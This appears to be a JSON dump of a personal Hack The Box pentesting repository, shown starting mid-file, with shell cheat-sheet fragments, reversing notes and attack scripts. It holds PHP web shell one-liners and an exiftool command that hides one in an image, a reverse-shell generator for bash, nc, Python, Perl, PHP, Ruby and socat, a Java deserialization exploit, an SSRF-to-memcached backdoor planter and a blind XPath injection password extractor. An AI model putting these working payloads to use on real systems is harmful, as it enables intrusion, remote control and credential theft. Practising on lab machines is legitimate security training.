webshell.php.jpg\n\n# Using exiftool\nexiftool -comment='<?php system($_GET['wr3nch']);?>' \\<file_name\\>.\\<extension\\>\n\n# normal php executables\n<php echo exec('whoami');?>\n<php system(\"whoami\"); ?>\n<php system($_REQUEST['wr3nch']); #\tworks with the post verb\n<php system($_GET['wr3nch']); >\n\n```\n\n##### References:\n- The reverse shells are composed in a place taken from [here](https://krober.biz/misc/reverse_shell)\n- Some points are reffered form [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)\n- Php reverse shell bt [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell)\n"
  },
  {
    "path": "notes/Reversing.md",
    "content": "# Reversing\n\n## Debuggers\n- [IDA Hex Rays](https://www.hex-rays.com/products/ida/support/download_freeware/)\n- [Ghidra](https://ghidra-sre.org/)\n- [Radare2](https://rada.re/n/radare2.html)\n- [Cutter](https://cutter.re/)\n- [GDB](https://www.gnu.org/software/gdb/)\n- [pwntools](https://github.com/Gallopsled/pwntools)\n\n## Commands\n\n- [GDB](#gdb)\n- [Radare2](#r2)\n- [Misc](#misc)\n\n### gdb <a name='gdb'></a>\n```bash\n# gdb\n# load the binary\ngdb ./binary\n\n# list the functions available in the binary\ninfo functions\n\n# disassemble a function\ndisassemble {function-name}  # disassemble main\n\n# switch the disassembly syntax between AT&T and Intel\nset disassembly-flavor intel # show instructions in Intel syntax\nset disassembly-flavor att   # show instructions in AT&T syntax\n\n# set a breakpoint at a specific address\nbreak *{memory-address}     # break *0x000011c6\n\n# run the program until it reaches the breakpoint\nr\n\n# execute the next source line, stepping over calls (use ni for a single instruction)\nn\n\n# step into the next source line (use si for a single instruction)\ns\n\n# show the contents of the registers\ninfo registers\n\n# show the flags register\np $eflags\n\n# view the contents of the stack\n# prints 20 words of hex starting at the address held by esp\nx/20x $esp # esp is used because it changes as values are pushed to / popped from the stack\n```\n\n### radare2 / r2 <a name='r2'></a>\n```bash\n# r2\n# open the binary in debug mode\nr2 -d ./binary\n\n# analyze all the available symbols, data etc.\naaa\n\n# list the available functions in the binary\nafl\n\n# seek to a function\ns {function-name}            # s main\n\n# print the disassembled function\npdf\n\n# disassemble a function by name\npdf @{function-name}        # pdf @sym.vuln\n\n# ---- debugger commands (db, dc, dcc, dcr, ds) ----\n# create a breakpoint\ndb {memory-address}         # db 0x5662a1ef\n\n# run until the breakpoint is reached\ndc\n\n# run until a call instruction is reached\ndcc\n\n# run until a ret instruction is reached\ndcr\n\n# step to the next instruction\nds\n\n\n# switch to visual mode\n## Visual mode commands are specified with the ## prefix\nV  # gives a stack view of the program\n\n## switch to interactive mode where stack, registers and disassembly are shown\n!\n\n## split the panes\n| # vertical split\n- # horizontal split\n\n## add a new section\n# a wide range of options will be shown, like breakpoints, hexdumps, functions etc.\n<ctrl> + \"\n\n## execute commands in visual mode\n: {debugger-command} # :dcc\n\n## restart the execution with the same breakpoints\n: ood\n\n## quit visual mode\nq\n\n# quit r2 without confirmation\nQ\n```\n\n### Misc <a name='misc'></a>\n```bash\n# check the security mitigations compiled into the binary\nchecksec --file ./binary\n\n# list the symbols (functions) in the binary\nreadelf --syms ./binary\n\n# dump a specific section's data (objdump -s -j <section>)\nobjdump -sj {section-name} ./binary # objdump -sj .rodata ./binary\n\n# obtain the kernel's crash message (e.g. segfault details)\ndmesg\n```"
  },
  {
    "path": "notes/linux-cli-productivity.md",
    "content": "# Linux Productivity\n---\n\nTools to perform actions in the terminal\n\n## Table Of Contents\n\n- [Package Location](#pl)\n---\n\n### Package Location <a name=\"pl\"></a>\n\n- Obtain the location of the files a package would install, without installing the package\n- The output lists every file the package would install, with its full path\n- Since every installed path is listed, the software's home directory can be read off the output\n\n```bash\nsudo apt-get install apt-file\n# fetch the package contents index once before searching\nsudo apt-file update\napt-file search <packageName>\n```\n"
  },
  {
    "path": "scripts/README.md",
    "content": "# Scripts\n\n- Some of the dump scripts created while playing !\n- Nvm if it isn't attractive !!\n\n### hackthebox\n- arkham.py --> Have ysoserial in the current directory and pass the arguments `url`, `command`, `secretkey`\n- htb-machines.py --> Prints the htb machines from its api\n- name_grab.py --> Grabs the file names in the git repo, created for the traceback machine.\n- nc-portscan.sh --> Port scanner using nc\n- rev-shells.py --> Generates a reverse shell based on the provided switch `bash, nc, python, perl, ruby, php, socat`\n- snapwr3nch.py --> prints the htb machine pwned achievement to an image file\n- travel.py --> Automated SSRF with the gopher scheme, obtains a shell as `www-data`\n- wr3nch.py --> first ever created automation script for htb */not so good/, don't want to make changes since it's the starting step*\n- xpath-inj.py --> XPath Injection on login, with usernames loaded into the script\n\n### installation\n#### Docker installation scripts\n- docker-linux.sh\n- docker-parrot.sh\n- docker-standard.sh\n\n- fping-install.sh --> fping is used to perform a network sweep and obtain information on the available users\n- pwntools-python3.sh --> installs pwntools\n- ptyhon[2|3]-pip.sh --> installs pip2.* and pip3.*\n\n\n### misc\n- adapter.sh --> When used with the [.p10k.zsh](https://github.com/romkatv/powerlevel10k) example function, shows the vpn on the right side when it is available\n- bashrc_custom --> Copy the file's content into `~/.bashrc` and source it. Enjoy 😉. Best with tmux !\n- fix-bg-noise-obs.sh --> fixes the background static noise in linux when recording with obs studio\n- pdf-protect.sh --> script I use to protect writeup pdf's with a password\n- report-gen.md --> model md file to generate pdfs with latex\n- report.sh --> generates a pdf from markdown using latex"
  },
  {
    "path": "scripts/hackthebox/arkham.py",
    "content": "#!/usr/bin/python\n\nfrom base64 import b64encode,b64decode\nfrom hashlib import sha1\nfrom pwn import *\nfrom requests import post, get\n\nimport hmac\nimport os\nimport pyDes\nimport sys\n\ndef main():\n    if len(sys.argv) < 4:\n        print(\"Java JSF exploit\")\n        # secret: SnNGOTg3Ni0=\n        print(\"Usage: {} <url> <cmd> <secret>\\n\".format(sys.argv[0]))\n        sys.exit()\n\n    url = sys.argv[1]\n    cmd = sys.argv[2]\n    secret = sys.argv[3]\n\n    log.info(\"Payload provided: {}\".format(cmd))\n    cmd = \"java -jar ./ysoserial.jar CommonsCollections6 \\\"{}\\\" > payload.bin\".format(cmd)\n    log.info(\"Generating the payload with: {}\".format(cmd))\n    os.system(cmd)\n\n    log.info(\"Payload was written to payload.bin, reading it into variable...\")\n    with open(\"payload.bin\", \"rb\") as f:\n        payload = f.read()\n\n    log.info(\"Length of payload: {} bytes\".format(len(payload)))\n\n    key = b64decode(secret)\n    des = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)\n    enc = des.encrypt(payload)\n    b = hmac.new(key, bytes(enc), sha1).digest()\n    payload = enc + b\n\n    log.info(\"Sending encoded payload: {}\".format(b64encode(payload)))\n    data = {\"javax.faces.ViewState\": b64encode(payload)}\n    r = post(url, data=data)\n    log.success(\"Done!\")\n\nif __name__ == \"__main__\":\n    main()\n"
  },
  {
    "path": "scripts/hackthebox/htb-machines.py",
    "content": "#!/usr/bin/env python3\nimport sys\n\nimport requests\nfrom pwn import *\n\nif len(sys.argv[1:]) != 1:\n    print(\"Usage: {} <htb-api key>\".format(sys.argv[0]))\n    sys.exit(1)\n\n# the api token is a credential: it goes into the query string but is never printed\napi_key = sys.argv[1]\nurl = \"https://www.hackthebox.eu/api/machines/get/all?api_token=\" + api_key\nheaders = {\"User-agent\": \"Mozilla 5.0\"}\n\nresp = requests.get(url=url, headers=headers)\nif resp.status_code == 200:\n    machines = resp.json()\n    log.info(\"Total of {} Machines\".format(len(machines)))\n\n    try:\n        # open the output once and append one markdown entry per machine\n        with open(\"machines.txt\", 'a') as file_:\n            for machine in machines:\n                lines = \"- [ ] {} - {} - {} - {} : {} <br />\\n<details>\\n\\t<summary> Summary of the box </summary>\\n - Yet to be completed \\n</details> \\n\\n\".format(machine['id'], machine['name'], machine['os'], machine['ip'], machine['rating'])\n                file_.write(lines)\n        print(\"All Machines Logged\")\n    except KeyboardInterrupt:\n        log.warning(\"Operation Ended by user\")\n        sys.exit(1)\nelse:\n    log.failure(\"API request failed with status code {}\".format(resp.status_code))\n"
  },
  {
    "path": "scripts/hackthebox/name_grab.py",
    "content": "import requests\nfrom bs4 import BeautifulSoup\n\nURL = input(\"Enter the github URL: \")\n\nprint(\"Scraping for file names in: {}\".format(URL))\n\nr = requests.get(URL)\nr.raise_for_status()\nsoup = BeautifulSoup(r.text, 'html.parser')\n# the class names below match the github file-listing markup this script was written against\ncontainer_ = soup.find('div', {'class': \"js-details-container Details\"})\nif container_ is None:\n    raise SystemExit(\"file listing container not found; the github markup may have changed\")\nname_ = container_.find_all('a', {'class': 'js-navigation-open link-gray-dark'})\nfor i in name_:\n    print(i.get('title'))\n"
  },
  {
    "path": "scripts/hackthebox/nc-portscan.sh",
    "content": "#!/bin/bash\n\nif [ $# -eq 0 ]; then\n  echo \"Pass the ip to scan\";\n  echo \"usage: nc-portscan <machine ip>\";\n  exit 1\nfi\n\necho \"looking for open ports in $1\"\n# -z: connect without sending data, -v: report the result; keep only the open ports\nfor i in $(seq 1 65535); do echo \"Port: $i\"; nc -zv \"$1\" \"$i\" 2>&1 | grep open; done\n"
  },
  {
    "path": "scripts/hackthebox/rev-shells.py",
    "content": "#!/usr/bin/env python3\n\nfrom pwn import *\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Quick Reverse shell provider\")\nparser.add_argument('-b', '--bash',metavar=('ip', 'port'), help=\"bash reverse shell\", nargs=2)\nparser.add_argument('-n', '--nc',metavar=('ip', 'port'), help=\"netcat reverse shell\", nargs=2)\nparser.add_argument('-py', '--python',metavar=('ip', 'port'), help=\"python reverse shell\", nargs=2)\nparser.add_argument('-p', '--perl',metavar=('ip', 'port'), help=\"perl reverse shell\", nargs=2)\nparser.add_argument('-r', '--ruby',metavar=('ip', 'port'), help=\"ruby reverse shell\", nargs=2)\nparser.add_argument('-php', '--php',metavar=('ip', 'port'), help=\"php reverse shell\", nargs=2)\nparser.add_argument('-s', '--socat',metavar=('ip', 'port'), help=\"socat reverse shell\", nargs=2)\nargparse = parser.parse_args()\n\ndef logo():\n\tprint(\"\"\"\n##      ## ########   #######  ##    ##  ######  ##     ## ########   ######  ##     ##  #######  ##       ##       \n##  ##  ## ##     ## ##     ## ###   ## ##    ## ##     ## ##     ## ##    ## ##     ## ##     ## ##       ##       \n##  ##  ## ##     ##        ## ####  ## ##       ##     ## ##     ## ##       ##     ##        ## ##       ##       \n##  ##  ## ########   #######  ## ## ## ##       ######### ########   ######  #########  #######  ##       ##       \n##  ##  ## ##   ##          ## ##  #### ##       ##     ## ##   ##         ## ##     ##        ## ##       ##       \n##  ##  ## ##    ##  ##     ## ##   ### ##    ## ##     ## ##    ##  ##    ## ##     ## ##     ## ##       ##       \n ###  ###  ##     ##  #######  ##    ##  ######  ##     ## ##     ##  ######  ##     ##  #######  ######## ######## \n\n \"\"\")\n\nif argparse.bash:\n\tlog.info(f'bash -i >& /dev/tcp/{argparse.bash[0]}/{argparse.bash[1]} 0>&1')\nelif argparse.nc:\n\tlog.info(f\"nc -e /bin/sh {argparse.nc[0]} {argparse.nc[1]}\")\n\tlog.info(f\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 
2>&1|nc {argparse.nc[0]} {argparse.nc[1]} >/tmp/f\")\nelif argparse.python:\n\tlog.info(f\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{argparse.python[0]}',{argparse.python[1]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'\")\nelif argparse.perl:\n\tlog.info(f\"perl -e 'use Socket;$i='{argparse.perl[0]}';$p={argparse.perl[1]};socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};'\\n\")\nelif argparse.php:\n\tlog.info(f\"php -r '$sock=fsockopen('{argparse.php[0]}',{argparse.php[1]});exec('/bin/sh -i <&3 >&3 2>&3');'\")\n\tlog.info(\"<?php system($_GET['cmd']);?>\")\n\tlog.info(f\"<?php exec('/bin/bash -c \\\"bash -i >& /dev/tcp/{argparse.php[0]}/{argparse.php[1]} 0>&1\\\"');\")\nelif argparse.ruby:\n\tlog.info(f\"ruby -rsocket -e'f=TCPSocket.open('{argparse.ruby[0]}',{argparse.ruby[1]}).to_i;exec sprintf('/bin/sh -i <&%d >&%d 2>&%d',f,f,f)'\")\nelif argparse.socat:\n\tlog.info(\"On the Attacker Machine: \\n\")\n\tlog.success(f\"socat file:`tty`,raw,echo=0 tcp-listen:{argparse.socat[1]}\")\n\tlog.info(\"On the Client Machine: \\n\")\n\tlog.success(f\"socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{argparse.socat[0]}:{argparse.socat[1]}\")\nelse:\n\tlogo()\n\tparser.print_help()\n\t\n\n\n"
  },
  {
    "path": "scripts/hackthebox/snapwr3nch.py",
    "content": "'''\n##############################################################################################\n provide your htb user id, machine Id and machine name\n user id : https://www.hackthebox.eu/home/users/profile/220867, 220867 9s the profile id\n api key can be found in `hackthebox.eu/home/settings`\n enter the machine name and get snapped =)\n\nrequired modules\n1. requests - pip3 install requests\n2. imgkit - pip3 install imgkit\nwkhtmltopdf to be used by imgkit - sudo apt-get install wkhtmltopdf\n3. coloroma - pip install colorama\n\nISSUE:\nIf you face error like: `requests.exceptions.SSLError: HTTPSConnectionPool`\nplease add `,verify= False)` in line 44\n\n###############################################################################################\n'''\n\nimport requests\nimport sys\nfrom colorama import Fore, Back, Style\nimport json\nimport imgkit\n\nBOLD = '\\033[1m'\nUNBOLD = \"\\033[0;0m\"\n\n\ndef gen():\n\t#variables\n\tURL = 'https://www.hackthebox.eu/api/machines/get/all?api_token='\n\tapi_ = input(\"Enter your API Key: \")\n\tURL += api_\n\n\n\tach_ = 'https://www.hackthebox.eu/achievement/machine/'\n\tuserId = input(\"Enter your htb id: \")\n\tmacNam = ''\n\n\tHEADERS = { 'User-agent': 'Mozilla 5.0'}\n\tmacId = ''\n# process\n\tr = requests.get(url = URL, headers = HEADERS)\n\tif r.status_code == 200:\n\t\tmachines = r.json()\n\n\t\tname = input(\"Machine name: \")\n\t\tmacNam = name\n\t\tfor machine in machines:\n\t\t\tif machine['name'].lower() == name.lower():\n\t\t\t\tmacId = str(machine['id'])\n\n\n\tprint(\"==================================================================\")\n\tprint(\"Capturing the \" + macNam + \" machine\")\n\tprint(\"==================================================================\")\n\n\n\tdn = ach_ + userId + '/' + macId\n\tred = requests.get(url = dn, headers = HEADERS)\n\t#print(dn)\n\n\tif \"Invalid\" in red.text:\n\t\tprint(\"Looks like, you Haven't completed the \"+ macNam + \"machine yet 
(>_<)\")\n\telse:\n\t\tprint(\"Congratulations on completing the box =D\")\n\t\tprint('Processing the snapshot...')\n\t\timgkit.from_url( dn , macNam +'.jpg')\n\n\n\ndef logo():\n    print(Fore.LIGHTGREEN_EX + \"\"\" \n\n    \t                                                               .oooo.                         oooo        \n                                                                    .dP\"\"Y88b                        `888        \n .oooo.o ooo. .oo.    .oooo.   oo.ooooo.  oooo oooo    ooo oooo d8b       ]8P' ooo. .oo.    .ooooo.   888 .oo.   \nd88(  \"8 `888P\"Y88b  `P  )88b   888' `88b  `88. `88.  .8'  `888\"\"8P     <88b.  `888P\"Y88b  d88' `\"Y8  888P\"Y88b  \n`\"Y88b.   888   888   .oP\"888   888   888   `88..]88..8'    888          `88b.  888   888  888        888   888  \no.  )88b  888   888  d8(  888   888   888    `888'`888'     888     o.   .88P   888   888  888   .o8  888   888  \n8\"\"888P' o888o o888o `Y888\"\"8o  888bod8P'     `8'  `8'     d888b    `8bd88P'   o888o o888o `Y8bod8P' o888o o888o \n                                888                                                                              \n                               o888o          \n\n                               \"\"\" + Fore.RESET)\n\n\nif __name__ == \"__main__\":\n    logo()\n    print(\"Simple SnapShot tool by wr3nch\")\n    print(BOLD + 'Coded by a n00b: '+ Fore.BLUE + 'cyberwr3ch' + Fore.LIGHTBLACK_EX + '\\nMember of TCSC' + Fore.RESET)\n    print('With the help of my bros, AdithyanAK and Gokul' + UNBOLD)\n    gen()\n    print(\"\\n Happy Hacking\")\n"
  },
  {
    "path": "scripts/hackthebox/travel.py",
    "content": "#!/usr/bin/env python3\nfrom urllib import parse\nfrom pwn import *\nfrom requests import *\n\n# variables\nfileN = input(str(\"Enter the backdoor name .php > \"))\ncommandN = input(str(\"Enter the php command >\"))\nkey = \"xct_4e5612ba079c530a6b1f148c0b352241\"\n\n# object creation\nobj ='O:14:\"TemplateHelper\":2:{s:4:\"file\";s:'+str(len(fileN))+':\"'+fileN+'\";s:4:\"data\";s:'+str(len(commandN))+':\"'+commandN+'\";}'\nlength = len(obj)\nlog.warning(\"PHP Object Created with length {}\".format(length))\n\n# gopher url\nlog.info(\"gopher url generated\")\ngopherurl = \"%0d%0aset {} 4 0 {}%0d%0a{}%0d%0a\".format(key,length,obj)\nlog.info (\"attempting SSRF\")\n\n# replacing url characters cause might result in double url encoding which causes to fail the exploit\n# ssrf_url = \"gopher://127.00.0.1:11211/_\"+parse.quote(gopherurl)\nssrf_url = \"gopher://127.00.0.1:11211/_\"+parse.quote(gopherurl).replace(\"+\",\"%20\").replace(\"%2F\",\"/\").replace(\"%25\",\"%\").replace(\"%3A\",\":\")\n\n\n# making request to the awesome-rss with customurl set\n#make = \"http://blog.travel.htb/awesome-rss/?debug=yes&custom_feed_url=\"+ssrf_url\n\nmake = \"http://blog.travel.htb/awesome-rss/?custom_feed_url=\"+ssrf_url\nlog.info(\"performing request on {}\".format(make))\nr = get(make)\nif r.status_code == 200:\n    log.info(\"Successfully made the request\")\n    log.info(\"Reloading contents\")\n    req = get(\"http://blog.travel.htb/awesome-rss/\")\n    if req.status_code == 200:\n        log.warning(\"looking for backdoor\")\n        door = \"http://blog.travel.htb/wp-content/themes/twentytwenty/logs/\"+fileN\n        back = get(door)\n        if back.status_code == 200:\n            log.success(\"{} found\".format(fileN))\n            log.success(\"Backdoor location: {} \\n\".format(door))\n        else:\n            log.failure(\"backdoor not found, server with the status code '{}'\".format(back.status_code))\n    else:\n        log.failure(\"Connection to 
refresh failed: {}\".format(req.status_code))\n\n\n###\n# Logs\n# - Observed changes when using rawurlencode(), changes occured \".Template.file & .Template.data\" - [x]\n# - Changed the change and looked no good result - [x]\n# - Add feed url and change the xct_ cache according to that - [ongoing]\n###\n"
  },
  {
    "path": "scripts/hackthebox/wr3nch.py",
    "content": "#!/bin/python3\r\n\r\nimport os\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Back, Style\r\n\r\nBOLD = '\\033[1m'\r\n\r\nmachine_ = input(str(\"Enter machine name: \"))\r\nip_ = input(str(\"Enter machine IP: \"))\r\nhttp_ = \"\"\r\nhttps_ = \"\"\r\nhport_ = int(80)\r\nhsport_ = \"443\"\r\n\r\n\r\ndef nmap():\r\n    print(BOLD + Fore.BLUE + \" \\n \\n[+]NMAP Enumeration Started \\n\" + Fore.WHITE)\r\n    nmap_ = 'sudo nmap -Pn -vv -sC -sV -oN {}.nmap {}'.format(machine_, ip_)\r\n    os.system(nmap_)\r\n    print(BOLD + Fore.RED + \"[+] NMAP Enumeration Ended \\n\" + Fore.WHITE)\r\n    print(BOLD + Fore.CYAN + \"[+] LOOKING FOR PORTS [+]\" + Fore.WHITE)\r\n    ports(\"{}.nmap\".format(machine_))\r\n\r\n\r\ndef ports(scanOutput):\r\n    with open(scanOutput) as outPut:\r\n        if \"http\" in outPut.read():\r\n            por_ = \"grep -w 'http' %s.nmap | cut -d '/' -f 1 | awk 'NR==1{print $1}' | cut -c1-5\" % machine_\r\n            print(Fore.LIGHTBLUE_EX + \"HTTP Port found in: \")\r\n            global hport_\r\n            hports_ = os.popen(por_).read()\r\n            hport_ = int(hports_)\r\n            print(hport_)\r\n            global http_\r\n            http_ = 1\r\n            direnumeration()\r\n\r\n        elif 'https' in outPut.read():\r\n            por_ = \"grep -w 'http' %s.nmap | cut -d '/' -f 1 | awk 'NR==1{print $1}' | cut -c1-5\" % machine_\r\n            print(Fore.LIGHTBLUE_EX + \"HTTP Port found in: \")\r\n            global hsport_\r\n            hports_ = os.popen(por_).read()\r\n            hsport_ = int(hports_)\r\n            print(hsport_)\r\n            global https_\r\n            https_ = 1\r\n            direnumeration()\r\n            \r\n        else:\r\n            print(BOLD + Fore.RED + \"HTTP / HTTPS ports are not found\")\r\n            print(BOLD + Fore.YELLOW + \"Enumerating UDP ports\")\r\n            nmapUDP = 'sudo nmap -sU {}'.format(ip_)\r\n            
os.system(nmapUDP)\r\n\r\n\r\n\r\ndef direnumeration():\r\n    print(BOLD + Fore.MAGENTA + \"[+] Directory Enumeration\" + Fore.WHITE)\r\n    while http_ :\r\n        gobuster_ =\"gobuster dir -u http://{}:{} -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,402,403,404,502 -x php,html,json,text -t 5 -o go-http.txt\".format(ip_, hport_)\r\n        os.system(gobuster_)\r\n        print(BOLD + Fore.RED + '[+] Root Directory Enumerated')\r\n        print(BOLD + Fore.GREEN + \"[+]VHost LookUp[+]\" + Fore.WHITE)\r\n        vhost()\r\n    \r\n    while https_:\r\n        gobuster_ =\"gobuster dir -u http://{}:{} -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,402,403,404,502 -x php,html,json,text -t 5 -o go-http.txt\".format(ip_, hport_)\r\n        os.system(gobuster_)\r\n        print('[+] Root Directory Enumerated')\r\n    print(Fore.BLUE + \"[+] Directory enumerated\")\r\n\r\n\r\n\r\ndef vhost():\r\n    print(BOLD + Fore.YELLOW + \"[+] VHOST Checking\" + Fore.WHITE)\r\n    vhst = \"ffuf -u http://FUZZ/{}:{} -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -sf -fc 401,402,403,404 -of vhost-ffuf.json\".format(ip_,hport_)\r\n    os.system(vhst)\r\n    user_ = 'whoami'\r\n    print(BOLD + Fore.RED + \"[+] VHOST Enumeration Completed\")\r\n    print(BOLD + Fore.LIGHTCYAN_EX + \"Every Process is done\" + Fore.RESET)\r\n    print(BOLD + Fore.GREEN + \"{+} Everthing is done, Meet you soon :\")\r\n    os.system(user_)\r\n    sys.exit()\r\n\r\n\r\n\r\ndef logo():\r\n    print(Fore.LIGHTGREEN_EX + \"\"\"                               \r\n                   ____        _                \r\n        __ __ ___ |__ /_ _  __| |_    _ __ _  _ \r\n        \\ V  V / '_|_ \\ ' \\/ _| ' \\ _| '_ \\ || |\r\n         \\_/\\_/|_||___/_||_\\__|_||_(_) .__/\\_, |\r\n                                     |_|   |__/ \r\n                        \"\"\" + Fore.RESET)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    logo()\r\n    
print(\"Test Version 2.0\")\r\n    print(BOLD + 'Coded by a n00b: '+ Fore.BLUE + 'cyberwr3ch' + Fore.LIGHTBLACK_EX + '\\nMember of TCSC')\r\n    print(Fore.YELLOW + \"Script that scans ports and enumerate dirs for CTF's\")\r\n    time.sleep(3)\r\n    nmap()\r\n"
  },
  {
    "path": "scripts/hackthebox/xpath-inj.py",
    "content": "import requests\n\n# variables: add the suspicious users to the u [] list\nurl = ''\nproxy_url = ''\nw = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*(){}:\"<>?'\nu = []\n\n\n# main logic for injection\nfor user in u:\n    # baseline: an always-false comparison gives the response length of a failed login\n    data = {'Username': '', 'Password': \"' or Username='\" + user + \"'and substring(Password,0,1)='x\"}\n    request = requests.post(url, data=data, proxies={'http': proxy_url})\n    b = len(request.text)  # 6756\n    cracked_pass = ''\n    print(' Attempting User {0}'.format(user))\n    for i in range(1, 80):\n        found = False\n        for c in w:\n            data = {'Username': '', 'Password': \"' or Username='\" + user + \"' and substring(Password,\" + str(i) + \",1)='\" + c + \"\"}\n            request = requests.post(url, data=data, proxies={'http': proxy_url})\n            if len(request.text) != b:\n                found = True\n                break\n        if not found:\n            # no character matched at this position: the password has ended\n            break\n        # only keep the character whose response length differed from the baseline\n        print('Found Character: {0} at position {1}'.format(c, i))\n        cracked_pass += c\n    print(cracked_pass)\n"
  },
  {
    "path": "scripts/installation/docker-linux.sh",
    "content": "#!/bin/bash\n\ncurl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -\necho 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list\nsudo apt update\nsudo apt remove docker docker-engine docker.io -y 2>/dev/null\nsudo apt install docker-ce -y\n"
  },
  {
    "path": "scripts/installation/docker-parrot.sh",
    "content": "#!/bin/bash\n\nif [ $EUID -ne 0 ];then\n\techo \"Please Run as root\"\n\texit 1\nfi\n\napt-get remove docker docker-engine docker.io containerd runc 2>/dev/null\napt-get update\napt-get install \\\n    apt-transport-https \\\n    ca-certificates \\\n    curl \\\n    gnupg-agent \\\n    software-properties-common\ncurl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -\n# write the repo to its own list file so re-running the script does not append duplicate entries\necho \"deb [arch=amd64] https://download.docker.com/linux/debian buster stable\" > /etc/apt/sources.list.d/docker.list\napt-get update\napt-get install docker-ce docker-ce-cli containerd.io\n"
  },
  {
    "path": "scripts/installation/docker-standard.sh",
    "content": "#!/bin/bash\n\ncurl -fsSL https://get.docker.com -o get-docker.sh\nsudo sh get-docker.sh\n"
  },
  {
    "path": "scripts/installation/fping-install.sh",
    "content": "#!/bin/bash\n\nsudo apt-get install fping\n"
  },
  {
    "path": "scripts/installation/pwntools-python3.sh",
    "content": "git clone https://github.com/arthaud/python3-pwntools; cd python3-pwntools; pip3 install -e .\n"
  },
  {
    "path": "scripts/installation/python2-pip.sh",
    "content": "#!/bin/bash\n\ncurl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py; python get-pip.py\n"
  },
  {
    "path": "scripts/installation/python3-pip.sh",
    "content": "#!/bin/bash\n\nsudo apt-get install python3-pip\n"
  },
  {
    "path": "scripts/misc/adapter.sh",
    "content": "#!/bin/bash\n\n# print the vpn (tun0) address when the vpn is up, otherwise the lan (eth0) address\ndn=$(ifconfig tun0 2>/dev/null | grep -P \"10.10.*.* \" | awk '{print $2}')\nnd=$(ifconfig eth0 2>/dev/null | grep -P \"192\\\\.168\\\\.[0-9]{1,3}\\\\.[0-9]{1,3}\" | awk '{print $2}')\n\nif [[ -z $dn ]]\nthen\n\techo \"$nd\"\nelse\n\techo \"$dn\"\nfi\n"
  },
  {
    "path": "scripts/misc/bashrc_custom",
    "content": "case $- in\n    *i*) ;;\n      *) return;;\nesac\n\nHISTCONTROL=ignoreboth\n\nshopt -s histappend\n\nHISTSIZE=1000\nHISTFILESIZE=2000\n\nshopt -s checkwinsize\n\n#shopt -s globstar\n\n#[ -x /usr/bin/lesspipe ] && eval \"$(SHELL=/bin/sh lesspipe)\"\n\nif [ -z \"${debian_chroot:-}\" ] && [ -r /etc/debian_chroot ]; then\n    debian_chroot=$(cat /etc/debian_chroot)\nfi\n\ncase \"$TERM\" in\n    xterm-color) color_prompt=yes;;\nesac\n\nforce_color_prompt=yes\n\nif [ -n \"$force_color_prompt\" ]; then\n    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then\n\t# We have color support; assume it's compliant with Ecma-48\n\t# (ISO/IEC-6429). (Lack of such support is extremely rare, and such\n\t# a case would tend to support setf rather than setaf.)\n\tcolor_prompt=yes\n    else\n\tcolor_prompt=\n    fi\nfi\n\n#htb_ip=`ifconfig tun0 | grep inet | tr -s \" \" | awk 'NR==1{print $2}'`\nhtb_ip=$(ip addr | grep tun0 | grep inet | grep 10. | tr -s \" \" | cut -d \" \" -f 3 | cut -d \"/\" -f 1)\n\n\n\nif [ \"$color_prompt\" = yes ]; then\n    PS1=\"${debian_chroot:+($debian_chroot)}\\[\\033[01;34m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;97m\\]\\W\\[\\033[00m\\]:[\\033[01;96m\\]$htb_ip\\033[00m\\]]\\$ \"\nelse\n    PS1='┌──[\\u@\\h]─[\\w]\\n└──╼ \\$ '\nfi\n\n# Set 'man' colors\nif [ \"$color_prompt\" = yes ]; then\n\tman() {\n\tenv \\\n\tLESS_TERMCAP_mb=$'\\e[01;31m' \\\n\tLESS_TERMCAP_md=$'\\e[01;31m' \\\n\tLESS_TERMCAP_me=$'\\e[0m' \\\n\tLESS_TERMCAP_se=$'\\e[0m' \\\n\tLESS_TERMCAP_so=$'\\e[01;44;33m' \\\n\tLESS_TERMCAP_ue=$'\\e[0m' \\\n\tLESS_TERMCAP_us=$'\\e[01;32m' \\\n\tman \"$@\"\n\t}\nfi\n\nunset color_prompt force_color_prompt\n\n# If this is an xterm set the title to user@host:dir\ncase \"$TERM\" in\nxterm*|rxvt*)\n    #PS1=\"\\[\\033[1;32m\\]\\342\\224\\200[\\[\\033[1;37m\\]\\u\\[\\033[01;32m\\]@\\[\\033[01;34m\\]\\h\\[\\033[1;32m\\]]\\342\\224\\200[\\[\\033[1;37m\\]\\w\\[\\033[1;32m\\]]\\\\$\\[\\e[0m\\] \"\n    
